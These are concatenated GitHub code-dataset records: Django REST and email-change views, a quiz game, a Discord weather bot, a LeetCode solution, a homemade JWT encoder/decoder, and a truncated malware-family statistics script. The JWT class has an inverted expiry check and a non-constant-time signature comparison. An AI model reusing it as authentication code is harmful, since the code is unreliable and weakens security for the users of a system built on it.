"python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "86", "api": [{"api_name": "math.radians", "line_number": 43, "usage_type": "argument"}, {"api_name": "math.sin", "line_number": 48, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 48, "usage_type": "call"}, {"api_name": "math.asin", "line_number": 49, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "csv.DictReader", "line_number": 71, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 81, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "12605406915", "text": "from django.contrib.auth.models import User, Group\nfrom rest_framework import viewsets\nfrom drawsaurus.serializers import UserSerializer, GroupSerializer\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404\nfrom drawsaurus.models import Game, TypedTurn, DrawingTurn\nfrom drawsaurus.serializers import GameSerializer, TypedTurnSerializer, DrawingTurnSerializer\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework import mixins, generics\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass 
GameList(generics.ListCreateAPIView):\n \"\"\"\n List all games, or create a new game.\n \"\"\"\n queryset = Game.objects.all()\n serializer_class = GameSerializer\n\n\nclass GameDetail(generics.RetrieveDestroyAPIView):\n \"\"\"\n Retrieve or delete a game.\n \"\"\"\n queryset = Game.objects.all()\n serializer_class = GameSerializer\n\n@api_view(['GET'])\ndef typed_turns_for_game(request, game_pk):\n \"\"\"\n Returns the ordered list of all typed turns so far in a game.\n \"\"\"\n if request.method == 'GET':\n try:\n game = Game.objects.get(pk=game_pk)\n except Game.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n typed_turns = TypedTurn.objects.filter(game=game)\n typed_serializer = TypedTurnSerializer(typed_turns, many=True)\n return Response(typed_serializer.data)\n\n\n@api_view(['GET'])\ndef drawing_turns_for_game(request, game_pk):\n \"\"\"\n Returns the ordered list of all drawing turns so far in a game.\n \"\"\"\n if request.method == 'GET':\n try:\n game = Game.objects.get(pk=game_pk)\n except Game.DoesNotExist:\n return HttpResponse(status=status.HTTP_404_NOT_FOUND)\n drawing_turns = DrawingTurn.objects.filter(game=game)\n drawing_serializer = DrawingTurnSerializer(drawing_turns, many=True)\n return Response(drawing_serializer.data)\n\n", "repo_name": "ChrisCooper/drawsaurus-server", "sub_path": "drawsaurus/views/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 2364, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 19, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.UserSerializer", "line_number": 20, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 23, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 23, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 27, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.GroupSerializer", "line_number": 28, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 31, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "drawsaurus.models.Game.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 35, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.GameSerializer", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveDestroyAPIView", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 39, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.objects.all", "line_number": 43, "usage_type": "call"}, {"api_name": 
"drawsaurus.models.Game.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 43, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.GameSerializer", "line_number": 44, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.objects.get", "line_number": 53, "usage_type": "call"}, {"api_name": "drawsaurus.models.Game.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 53, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.DoesNotExist", "line_number": 54, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 54, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 55, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 55, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 55, "usage_type": "name"}, {"api_name": "drawsaurus.models.TypedTurn.objects.filter", "line_number": 56, "usage_type": "call"}, {"api_name": "drawsaurus.models.TypedTurn.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.TypedTurn", "line_number": 56, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.TypedTurnSerializer", "line_number": 57, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 58, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 46, "usage_type": "call"}, {"api_name": "drawsaurus.models.Game.objects.get", "line_number": 68, "usage_type": "call"}, {"api_name": "drawsaurus.models.Game.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 68, "usage_type": "name"}, {"api_name": "drawsaurus.models.Game.DoesNotExist", "line_number": 69, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.Game", "line_number": 69, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 70, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 70, "usage_type": "name"}, {"api_name": "drawsaurus.models.DrawingTurn.objects.filter", "line_number": 71, "usage_type": "call"}, {"api_name": "drawsaurus.models.DrawingTurn.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "drawsaurus.models.DrawingTurn", "line_number": 71, "usage_type": "name"}, {"api_name": "drawsaurus.serializers.DrawingTurnSerializer", "line_number": 72, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "38788309294", "text": "\"\"\"\nmy blog: https://www.cnblogs.com/marvintang1001/p/11177021.html\n\n\"\"\"\n\nfrom collections import Counter\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n counter = Counter(nums).most_common() # 按出现次数从大到小排列\n alist = []\n for i in range(k):\n alist.append(counter[i][0]) # 返回的是一个元组:【0】是字符串,【1】是出现次数\n return alist\n\n", "repo_name": "Marvintang1001/my_leetcode", "sub_path": "python/347.py", "file_name": "347.py", "file_ext": "py", "file_size_in_byte": 463, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "collections.Counter", 
"line_number": 10, "usage_type": "call"}]} +{"seq_id": "23603732787", "text": "# coding=utf-8\nfrom django.shortcuts import render, get_object_or_404\nfrom mycompanies.models import Company\nfrom myusers.models import MyUser\nfrom system.models import Transactions\nfrom mycompanies.forms import CompanyForm, LoginChangeForm\nfrom django.template.context_processors import csrf\nfrom django.http import HttpResponseRedirect\nfrom django.template.response import TemplateResponse\nfrom django.core.mail import send_mail\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.utils.encoding import force_text\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.contrib.auth import (get_user_model)\nfrom django.http import HttpResponse\nimport json\n\nimport datetime\nfrom rest_framework import viewsets\nfrom mycompanies.serializers import CompanyListSerializer\n\n# Create your views here.\n\ndef company_index(request):\n\n if request.user.is_authenticated():\n \n user = request.user\n if user.company_id == None:\n return HttpResponseRedirect(\"/\")\n \n company = get_object_or_404(Company, pk=user.company_id)\n \n if request.method == \"POST\":\n \n form = CompanyForm(request.POST, instance=company)\n if form.is_valid():\n company = form.save(commit=False)\n company.save()\n return HttpResponseRedirect(\"/\")\n else:\n company_form = CompanyForm(instance=company)\n context = {\n 'form': company_form,\n 'email': user.username,\n 'login_change_form': LoginChangeForm()\n }\n context.update(csrf(request))\n \n return render(request, 'company_index.html', context)\n\n else:\n return HttpResponseRedirect(\"/\")\n\ndef login_change(request):\n\n if request.user.is_authenticated():\n user = request.user;\n if request.method == \"POST\":\n form = LoginChangeForm(request.POST)\n if form.is_valid():\n email = request.POST['email'].strip()\n if email == user.username:\n response_data = {}\n response_data['result'] = 'fasle'\n response_data['msg'] = 'Please enter another e-mail'\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n else: \n try:\n emaildb = MyUser.objects.get(email=email)\n except:\n emaildb = False\n if emaildb:\n response_data = {}\n response_data['result'] = 'fasle'\n response_data['msg'] = 'Company with this e-mail already exists. 
Please enter another e-mail'\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n email = emaildb\n else:\n uid = urlsafe_base64_encode(force_bytes(user.pk))\n token = default_token_generator.make_token(user)\n transaction_id = uid.decode(\"utf-8\")+'-'+token\n \n send_mail('Change e-mail', 'http://127.0.0.1:8000/mycompanies/login_change/'+transaction_id+'/', 'my.mybookings.myservices@gmail.com',\n [email], fail_silently=False)\n lifetime = datetime.datetime.utcnow() + datetime.timedelta(hours=2)\n try:\n current_transaction = Transactions.objects.get(transaction_id=transaction_id)\n except:\n current_transaction = False\n if current_transaction:\n current_transaction.email = email\n current_transaction.lifetime = lifetime\n current_transaction.save()\n else:\n Transactions.objects.create(transaction_id=transaction_id, email=email, lifetime=lifetime)\n response_data = {}\n response_data['result'] = 'true'\n response_data['msg'] = 'e-mail sent'\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n context = {\n 'form': form,\n 'email': email,\n }\n return TemplateResponse(request, 'email_change.html', context)\n return HttpResponseRedirect(\"/\")\n else:\n form = LoginChangeForm()\n context = {\n 'form': form,\n 'email': user.username,\n }\n context.update(csrf(request))\n return TemplateResponse(request, 'login_change.html', context)\n \n else:\n return HttpResponseRedirect(\"/\")\n \n\ndef login_change_confirm(request, uidb64=None, token=None,\n template_name='login_change_confirm.html',\n token_generator=default_token_generator,\n post_reset_redirect=None):\n\n if not request.user.is_authenticated():\n return HttpResponseRedirect(\"/\")\n UserModel = get_user_model()\n assert uidb64 is not None and token is not None\n try:\n # urlsafe_base64_decode() decodes to bytestring on Python 3\n uid = force_text(urlsafe_base64_decode(uidb64))\n user = UserModel._default_manager.get(pk=uid)\n except (TypeError, ValueError, OverflowError, UserModel.DoesNotExist):\n user = None\n if user is not None and token_generator.check_token(user, token):\n validlink = True\n transaction_id=uidb64+'-'+token\n try:\n transaction = Transactions.objects.get(transaction_id=transaction_id)\n except:\n transaction = False\n if transaction:\n# if transaction.lifetime > datetime.datetime.utcnow():\n user.username = transaction.email\n user.email = transaction.email\n user.save()\n transaction.delete()\n return HttpResponseRedirect(post_reset_redirect)\n form = None\n else:\n validlink = False\n form = None\n context = {\n 'form': form,\n 'validlink': validlink,\n }\n return TemplateResponse(request, template_name, context)\n\n\nclass CompanyViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = Company.objects.all()\n serializer_class = CompanyListSerializer\n", "repo_name": "mybookinglife/CPA_ver_1.0.2", "sub_path": "mycompanies/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.http.HttpResponseRedirect", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 34, "usage_type": "call"}, {"api_name": "mycompanies.models.Company", "line_number": 34, "usage_type": "argument"}, {"api_name": "mycompanies.forms.CompanyForm", "line_number": 38, "usage_type": 
"call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 42, "usage_type": "call"}, {"api_name": "mycompanies.forms.CompanyForm", "line_number": 44, "usage_type": "call"}, {"api_name": "mycompanies.forms.LoginChangeForm", "line_number": 48, "usage_type": "call"}, {"api_name": "django.template.context_processors.csrf", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 55, "usage_type": "call"}, {"api_name": "mycompanies.forms.LoginChangeForm", "line_number": 62, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 69, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 70, "usage_type": "call"}, {"api_name": "myusers.models.MyUser.objects.get", "line_number": 75, "usage_type": "call"}, {"api_name": "myusers.models.MyUser.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "myusers.models.MyUser", "line_number": 75, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 82, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 83, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_encode", "line_number": 88, "usage_type": "call"}, {"api_name": "django.utils.encoding.force_bytes", "line_number": 88, "usage_type": "call"}, {"api_name": "django.contrib.auth.tokens.default_token_generator.make_token", "line_number": 89, "usage_type": "call"}, {"api_name": "django.contrib.auth.tokens.default_token_generator", "line_number": 89, "usage_type": "name"}, {"api_name": "django.core.mail.send_mail", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 94, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects.get", "line_number": 96, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "system.models.Transactions", "line_number": 96, "usage_type": "name"}, {"api_name": "system.models.Transactions.objects.create", "line_number": 104, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "system.models.Transactions", "line_number": 104, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 108, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 109, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 116, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 117, "usage_type": "call"}, {"api_name": "mycompanies.forms.LoginChangeForm", "line_number": 119, "usage_type": "call"}, {"api_name": "django.template.context_processors.csrf", "line_number": 124, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 125, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 128, "usage_type": "call"}, {"api_name": "django.contrib.auth.tokens.default_token_generator", "line_number": 133, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 137, "usage_type": "call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 138, "usage_type": "call"}, 
{"api_name": "django.utils.encoding.force_text", "line_number": 142, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_decode", "line_number": 142, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": "system.models.Transactions.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "system.models.Transactions", "line_number": 150, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 159, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 168, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 171, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 171, "usage_type": "name"}, {"api_name": "mycompanies.models.Company.objects.all", "line_number": 175, "usage_type": "call"}, {"api_name": "mycompanies.models.Company.objects", "line_number": 175, "usage_type": "attribute"}, {"api_name": "mycompanies.models.Company", "line_number": 175, "usage_type": "name"}, {"api_name": "mycompanies.serializers.CompanyListSerializer", "line_number": 176, "usage_type": "name"}]} +{"seq_id": "18838728715", "text": "from question_model import Question\nfrom data import question_data\nfrom quiz_brain import QuizBrain\n\nquestion_bank = []\nfor dictionary in question_data:\n our_question = dictionary[\"question\"]\n our_answer = dictionary[\"correct_answer\"]\n question_bank.append(Question(our_question, our_answer))\n\nquiz_brain = QuizBrain(question_bank)\nwhile quiz_brain.still_has_question():\n quiz_brain.next_question()\n print()\nprint(\"You have completed the Quiz\")\nprint(f\"Your final score is: {quiz_brain.score}/{quiz_brain.question_number}\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# from question_model import Question\n# from data import question_data\n# from quiz_brain import QuizBrain\n#\n# question_bank = []\n# for index in range(0, len(question_data) - 1):\n# dicts = question_data[index]\n# text = dicts[\"text\"]\n# answer = dicts[\"answer\"]\n# question_bank.append(Question(text, answer))\n#\n# running = True\n# while running:\n# quiz_brain = QuizBrain(question_bank)\n# if quiz_brain.next_question() == answer:\n# quiz_brain.next_question()\n#\n# else:\n# print(f\"Your score is: {quiz_brain.question_number}/{len(question_bank)}\")\n# running = False\n", "repo_name": "codenamejj/quiz-game-start", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "data.question_data", "line_number": 6, "usage_type": "name"}, {"api_name": "question_model.Question", "line_number": 9, "usage_type": "call"}, {"api_name": "quiz_brain.QuizBrain", "line_number": 11, "usage_type": "call"}, {"api_name": "quiz_brain.still_has_question", "line_number": 12, "usage_type": "call"}, {"api_name": "quiz_brain.next_question", "line_number": 13, "usage_type": "call"}, {"api_name": "quiz_brain.score", "line_number": 16, "usage_type": "attribute"}, {"api_name": "quiz_brain.question_number", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "73683552284", "text": "from django.urls import path\nfrom . 
import views\nurlpatterns = [\n path('', views.index),\n path('registro', views.registro),\n path('logearse',views.logearse),\n path('panel',views.panel),\n path('logout',views.logout),\n path('colaborador',views.colaborador),\n path('administrador',views.administrador)\n\n]\n", "repo_name": "egrilli/login_registro", "sub_path": "app_lr/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 4, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "1279188761", "text": "import requests\nimport json\nimport secretvars\nimport discord\n\nss = secretvars.secretvars()\nweatherkey = ss.weatherkey\nbase_url = \"https://api.weatherapi.com/v1/forecast.json?key=\"\n\nasync def wthr(ctx):\n words = ctx.message.content\n important_words = words[8:]\n city_name = important_words\n complete_url = base_url + weatherkey + '&q=' + city_name + '&aqi=no'\n print(complete_url)\n response = requests.get(complete_url)\n data = response.json()\n try:\n # store the value of \"main\" \n # key in variable current \n current = data[\"current\"]\n forecast = data['forecast']\n forecastday = forecast['forecastday'][0]['day']\n astro = forecast['forecastday'][0]['astro']\n\n condition = current[\"condition\"]\n\n embed=discord.Embed(title=data[\"location\"][\"name\"]+', '+data[\"location\"][\"region\"]+', '+data[\"location\"][\"country\"]+'\\t')\n\n # Temperature\n embed.add_field(name='Temperature', value=str(current[\"temp_f\"])+'°F', inline=False)\n\n # Humidity\n embed.add_field(name='Humidity', value=str(current['humidity'])+'%', inline=False)\n\n # Feels like\n embed.add_field(name='Feels Like', value=str(current['feelslike_f'])+'°F', inline=False)\n\n # High Temperature\n embed.add_field(name='High', value=str(forecastday['maxtemp_f'])+'°F', inline=True)\n\n # Low Temperature\n embed.add_field(name='Low', value=str(forecastday['mintemp_f'])+'°F', inline=True)\n\n # Chance of Rain\n embed.add_field(name='Chance of Rain', value=str(forecastday['daily_chance_of_rain'])+'%', inline=True)\n \n # Wind Speed\n embed.add_field(name='Wind Speed', value=str(current['wind_mph'])+'mph', inline=True)\n\n # Wind Direction\n embed.add_field(name='Wind Direction', value=current['wind_dir'], inline=True)\n\n # Pressure\n embed.add_field(name='Pressure', value=str(current['pressure_in'])+' in', inline=True)\n \n # UV Index\n embed.add_field(name='UV Index', value=current['uv'], inline=True)\n\n # Sunrise time\n embed.add_field(name='Sunrise', value=astro['sunrise'], inline=True)\n\n #Sunset Time\n embed.add_field(name='Sunset', value=astro['sunset'], inline=True)\n \n # When the weather data was recorded\n embed.set_footer(text='Last updated at '+current['last_updated'])\n\n # Weather condition icon\n embed.set_thumbnail(url='https:'+condition['icon'])\n \n await ctx.send(embed=embed)\n except:\n embed=discord.Embed(title='Error '+str(data['error']['code']),description=data['error']['message'])\n await 
ctx.send(embed=embed)\n", "repo_name": "shaheriar/BotJarvisDiscord", "sub_path": "weather.py", "file_name": "weather.py", "file_ext": "py", "file_size_in_byte": 2698, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "secretvars.secretvars", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 28, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "42410378148", "text": "from django.conf.urls import patterns, include, url\n\n\nurlpatterns = patterns('',\n url(r'^$', 'files.views.index', name='index'),\n \n url(r'^reset/$', 'files.views.reset', name='reset'),\n \n url(r'^capabilities/$', 'files.views.capabilities', name='capabilities'),\n \n url(r'^analyzed/$', 'files.views.analyzed', name='analyzed'),\n \n url(r'^analyze/$', 'files.views.analyze', name='analyze'),\n \n url(r'^transcode/$', 'files.views.transcode', name='transcode'),\n \n url(r'^download/$', 'files.views.download', name='download'),\n)\n", "repo_name": "sueastside/damn-oga", "sub_path": "damn_oga/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "74532821723", "text": "import base64\r\nimport copy\r\nimport hmac\r\nimport json\r\nimport time\r\n\r\n\r\nclass Jwt:\r\n def __init__(self):\r\n pass\r\n\r\n @staticmethod\r\n def encode(payload, key, exp=300):\r\n \"\"\"\r\n base64.urlsafe_b64encode\r\n :param payload:\r\n :param key:\r\n :param exp:\r\n :return:\r\n \"\"\"\r\n har = {\r\n 'alg': 'HS256',\r\n 'typ': 'JWT'\r\n }\r\n\r\n # separators: the first element joins the key/value pairs, the second joins each key to its value\r\n # sort_keys: always emit the JSON string with keys in sorted order\r\n har = json.dumps(har, separators=(',', ':'), sort_keys=True)\r\n b_har = Jwt.b64encode(har.encode())\r\n\r\n payload = copy.deepcopy(payload)\r\n payload['exp'] = int(time.time() + exp)\r\n pld = json.dumps(payload, separators=(',', ':'), sort_keys=True)\r\n b_pld = Jwt.b64encode(pld.encode())\r\n\r\n sign = b_har + b'.' + b_pld\r\n if isinstance(key, str):\r\n key = key.encode()\r\n\r\n h = hmac.new(key, sign, digestmod='SHA256')\r\n data = h.digest()\r\n\r\n b_sign = Jwt.b64encode(data)\r\n\r\n return b_har + b'.' + b_pld + b'.' + b_sign\r\n\r\n @staticmethod\r\n def b64encode(s):\r\n return base64.urlsafe_b64encode(s).replace(b'=', b'')\r\n\r\n @staticmethod\r\n def b64decode(bs):\r\n \"\"\"\r\n Pad the string back to a valid base64 length\r\n :param bs:\r\n :return:\r\n \"\"\"\r\n third = 4 - (len(bs) % 4)\r\n bs += b'=' * third\r\n return base64.urlsafe_b64decode(bs)\r\n\r\n @staticmethod\r\n def decode(token, key):\r\n bs = token.split(b'.')\r\n sign = bs[0] + b'.' 
+ bs[1]\r\n if isinstance(key, str):\r\n key = key.encode()\r\n h = hmac.new(key, sign, digestmod='SHA256')\r\n b_sign = Jwt.b64encode(h.digest())\r\n f = bs[0] + b'.' + bs[1] + b'.' + b_sign\r\n if f != token:\r\n raise JwtSignError('Your token is invalid')\r\n bss = Jwt.b64decode(bs[1])\r\n bss = json.loads(bss)\r\n if bss['exp'] < int(time.time() + 300):\r\n print(time.time() + 300)\r\n print(bss['exp'])\r\n raise JwtSignError('Your token has expired')\r\n return True\r\n\r\n\r\nclass JwtSignError(Exception):\r\n def __init__(self, error_msg):\r\n self.error = error_msg\r\n\r\n def __str__(self):\r\n return '<JwtSignError error {}>'.format(self.error)\r\n\r\n\r\n", "repo_name": "lr616731587/ToolHelper", "sub_path": "My_JWT.py", "file_name": "My_JWT.py", "file_ext": "py", "file_size_in_byte": 2411, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dumps", "line_number": 28, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 31, "usage_type": "call"}, {"api_name": "time.time", "line_number": 32, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 33, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 40, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 49, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64decode", "line_number": 60, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 68, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 74, "usage_type": "call"}, {"api_name": "time.time", "line_number": 75, "usage_type": "call"}, {"api_name": "time.time", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "30148621153", "text": "import os\nimport json\nimport shutil\nimport sys\nimport glob\nimport subprocess\nimport io\nimport tqdm\n\n\"\"\"\nIndicates the year to aggregate data for.\n\"\"\"\nYEARS = [year for year in sys.argv if year.isnumeric()]\n\n\"\"\"\nIndicates samples should be grouped together by malware family.\n\"\"\"\nNORMALIZE = \"--normalize\" in sys.argv\n\n\"\"\"\nApply corrections on thread hijack - process hollow\n\"\"\"\nCORRECT = \"--correct\" in sys.argv\n\n\"\"\"\nIndicates the family classification should be rebuilt.\n\"\"\"\nFORCE_RECLASSIFY = \"--reclassify\" in sys.argv\n\nclass FamilyStatistics:\n def __init__(self, name: str):\n self.name = name\n self.all_samples = set()\n self.included_samples = set()\n self.positive_samples = dict()\n\n def add_and_include(self, sample_hash):\n self.all_samples.add(sample_hash)\n self.included_samples.add(sample_hash)\n\n def is_singleton(self):\n return self.name.startswith(\"SINGLETON:\")\n\n def get_positive_rate(self):\n if len(self.included_samples) == 0:\n return 0\n assert set(self.positive_samples.keys()).issubset(self.included_samples)\n return len(self.positive_samples) / len(self.included_samples)\n\n def get_detected_behaviors(self):\n result = set()\n for sample, behaviors in self.positive_samples.items():\n result.update(behaviors)\n return result\n\n def get_detected_behaviors_hist(self):\n counts = dict()\n for _, behaviors in self.positive_samples.items():\n for b in behaviors:\n counts[b] = counts.get(b, 0) + 1\n return counts\n\n def get_preferred_behavior(self):\n if len(self.positive_samples) == 0:\n return None\n \n hist = self.get_detected_behaviors_hist()\n return sorted(hist.items(), key=lambda x: -x[1])[0][0]\n \n\n def has_positives(self):\n return len(self.positive_samples) > 0\n\n def 
